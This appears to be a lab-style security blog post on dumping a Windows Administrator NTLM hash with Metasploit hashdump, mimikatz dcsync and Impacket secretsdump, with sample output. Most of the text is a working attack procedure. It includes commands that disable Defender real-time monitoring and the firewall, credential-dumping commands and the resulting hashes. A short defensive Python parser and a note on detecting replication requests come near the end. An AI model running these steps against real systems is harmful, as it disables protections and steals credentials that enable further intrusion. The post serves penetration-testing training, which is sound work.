How to dump the NTLM hash of user Administrator

Using Metasploit hashdump

After getting a shell as Administrator, do the following.

First, disable real-time protection if it is enabled:

```powershell
Set-MpPreference -DisableRealtimeMonitoring $true
```

Then turn off the Windows Firewall for the current profile (this netsh command controls the firewall, not anti-virus):

```powershell
netsh advfirewall set currentprofile state off
```
  • Get a Meterpreter shell on the target machine.

Background the session with Ctrl+Z:

```
meterpreter >
Background session 1? [y/N]  y
```

Load the module post/windows/gather/hashdump:

```
msf5 exploit(multi/handler) > use post/windows/gather/hashdump
```

List your backgrounded sessions:

```
msf5 post(windows/gather/hashdump) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ MACHINE  10.10.14.X:2345 -> 10.10.10.X:49696 (10.10.10.X)
```

Set your session and run the module:

```
msf5 post(windows/gather/hashdump) > set session 1
session => 1
msf5 post(windows/gather/hashdump) > run

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY d132fb96a18c6ee06dee89f8effb8e06...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:97fc053bc0b23588798277b22540c40d:::

[*] Post module execution completed
```

Each line has the form user:RID:LM hash:NTLM hash:::. The hash is divided into two parts: the first is the LM hash and the second is the NTLM hash.

The NTLM hash is 97fc053bc0b23588798277b22540c40d.

Just copy and paste the NTLM hash into the writeup where I asked for it.

Using mimikatz

After getting a shell as Administrator, do the following.

First, disable real-time protection if it is enabled:

```powershell
Set-MpPreference -DisableRealtimeMonitoring $true
```

Then turn off the Windows Firewall for the current profile (this netsh command controls the firewall, not anti-virus):

```powershell
netsh advfirewall set currentprofile state off
```

Then run mimikatz with the following arguments:

```powershell
./mimikatz.exe "lsadump::dcsync /user:administrator"
```

You can download mimikatz from here.

You will get output like this:

```
C:\tmp> ./mimikatz.exe "lsadump::dcsync /user:administrator"

  .#####.   mimikatz 2.2.0 (x86) #18362 Feb  8 2020 12:26:09
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
  ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # lsadump::dcsync /user:administrator
[DC] 'domain.LOCAL' will be the domain
[DC] 'machine.domain.LOCAL' will be the DC server
[DC] 'administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   : 
Password last change : 1/24/2020 9:14:15 AM
Object Security ID   : S-1-5-21-2966785786-3096785034-1186376766-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: f9485863c1e9e05851ab40cbb5ab9dff
```

The NTLM hash we got is f9485863c1e9e05851ab40cbb5ab9dff.

Just copy and paste it into the writeup where I asked for it.

Using secretsdump

If you have owned a machine and you have the Administrator user's password, you can get the NTLM hash of Administrator using secretsdump, a tool from the Impacket toolkit:

```shell
secretsdump.py -just-dc-ntlm domain.local/Administrator:"Mypass"@10.10.10.X
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1b9e07543aa40cbb4ab9dfd:::
```

The hash line is again divided into two sections: first the LM hash and second the NTLM hash. Like mimikatz's dcsync, this method pulls the secrets over DRSUAPI directory replication; replication requests coming from a host that is not a domain controller are a standard detection signal.

Here the NTLM hash is d9485863c1b9e07543aa40cbb4ab9dfd. Just copy and paste it into the writeup where I asked for it.
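The pwdump-style lines produced by hashdump and secretsdump above share one format, so the following is an added example (not code from the post or from Metasploit or Impacket) that parses such lines and flags what a defender reviewing a dump wants to know: whether real LM hashes are still stored, whether any account has an empty password, and which entry is the built-in RID 500 administrator. The sample input is constructed; it reuses the page's Administrator line plus a made-up second account with placeholder hashes.

```python
import re
from dataclasses import dataclass
from typing import Optional

# LM hash of an empty password; also what Windows stores when LM hash storage is
# disabled (NoLMHash policy), so this value carries no credential material.
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of an empty password (MD4 over an empty UTF-16LE string).
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"

# pwdump-style line: user:RID:LM hash:NT hash::: (the trailing fields are unused here)
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

@dataclass
class HashEntry:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def lm_stored(self) -> bool:
        """True when a real LM hash is present, i.e. LM storage was not disabled."""
        return self.lm != EMPTY_LM_HASH

    @property
    def empty_password(self) -> bool:
        return self.nt == EMPTY_NT_HASH

def parse_hash_line(line: str) -> Optional[HashEntry]:
    """Parse one hashdump/secretsdump line; status lines and banners return None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return HashEntry(m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower())

def audit(dump: str) -> dict:
    """Collect per-user NT hashes and the policy findings a defender cares about."""
    out = {"entries": {}, "lm_stored": [], "empty_password": [], "builtin_admin": []}
    for entry in filter(None, map(parse_hash_line, dump.splitlines())):
        out["entries"][entry.user] = entry.nt
        if entry.lm_stored:
            out["lm_stored"].append(entry.user)
        if entry.empty_password:
            out["empty_password"].append(entry.user)
        if entry.rid == 500:  # built-in Administrator regardless of its display name
            out["builtin_admin"].append(entry.user)
    return out

# Constructed sample: the page's hashdump line plus a made-up account with placeholder hashes.
SAMPLE = """[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:97fc053bc0b23588798277b22540c40d:::
svc_legacy:1105:0123456789abcdef0123456789abcdef:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Post module execution completed"""
```

Running `audit(SAMPLE)` reports svc_legacy under both lm_stored and empty_password, and Administrator as the RID 500 account.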

This post is licensed under CC BY 4.0

© Dedinfosec. All rights reserved.